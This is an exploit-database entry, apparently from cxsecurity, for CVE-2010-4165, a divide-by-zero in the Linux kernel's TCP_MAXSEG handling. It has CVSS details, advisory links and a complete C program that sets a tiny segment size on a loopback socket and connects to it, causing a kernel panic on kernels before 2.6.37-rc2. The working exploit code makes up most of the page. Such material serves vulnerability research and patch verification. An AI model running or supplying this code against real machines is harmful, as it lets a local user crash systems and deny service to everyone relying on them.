Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS

2011.03.11
Credit: zx2c4
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2010-4165
CWE: CWE-189


CVSS Base Score: 4.9/10
Impact Subscore: 6.9/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

/* * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2 * by zx2c4 * * This exploit triggers CVE-2010-4165, a divide by zero * error in net/ipv4/tcp.c. Because this is on the softirq * path, the kernel oopses and then completely dies with * no chance of recovery. It has been very reliable as a * DoS, but is not useful for triggering other bugs. * * -zx2c4, 28-2-2011 */ #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <net/if.h> #include <arpa/inet.h> #include <netinet/tcp.h> int main() { struct sockaddr_in laddr; memset(&laddr, 0, sizeof(laddr)); laddr.sin_family = AF_INET; laddr.sin_addr.s_addr = inet_addr("127.0.0.1"); laddr.sin_port = htons(31337); int listener = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (listener < 0) { printf("[-] Could not open listener.\n"); return -1; } int val = 12; if (setsockopt(listener, IPPROTO_TCP, TCP_MAXSEG, &val, sizeof(val)) < 0) { printf("[-] Could not set sockopt.\n"); return -1; } if (bind(listener, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { printf("[-] Could not bind to address.\n"); return -1; } if (listen(listener, 1) < 0) { printf("[-] Could not listen.\n"); return -1; } int hello = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (hello < 0) { printf("[-] Could not open connector.\n"); return -1; } if (connect(hello, (struct sockaddr*)&laddr, sizeof(struct sockaddr)) < 0) { printf("[-] Could not connect to listener.\n"); return -1; } printf("[-] Connection did not trigger oops.\n"); return 0; }

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7a1abd08d52fdeddb3e9a5a33f2f15cc6a5674d2
https://bugzilla.redhat.com/show_bug.cgi?id=652508
http://www.vupen.com/english/advisories/2011/0298
http://www.vupen.com/english/advisories/2011/0124
http://www.vupen.com/english/advisories/2011/0012
http://ww2000w.spinics.net/lists/netdev/msg146495.html
http://www.spinics.net/lists/netdev/msg146405.html
http://www.securityfocus.com/bid/44830
http://www.osvdb.org/69241
http://www.openwall.com/lists/oss-security/2010/11/12/4
http://www.openwall.com/lists/oss-security/2010/11/12/1
http://www.mandriva.com/security/advisories?name=MDVSA-2011:029
http://www.kernel.org/pub/linux/kernel/v2.6/testing/ChangeLog-2.6.37-rc2
http://secunia.com/advisories/42932
http://secunia.com/advisories/42801
http://secunia.com/advisories/42778
http://lists.opensuse.org/opensuse-security-announce/2011-02/msg00000.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00004.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00001.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00000.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top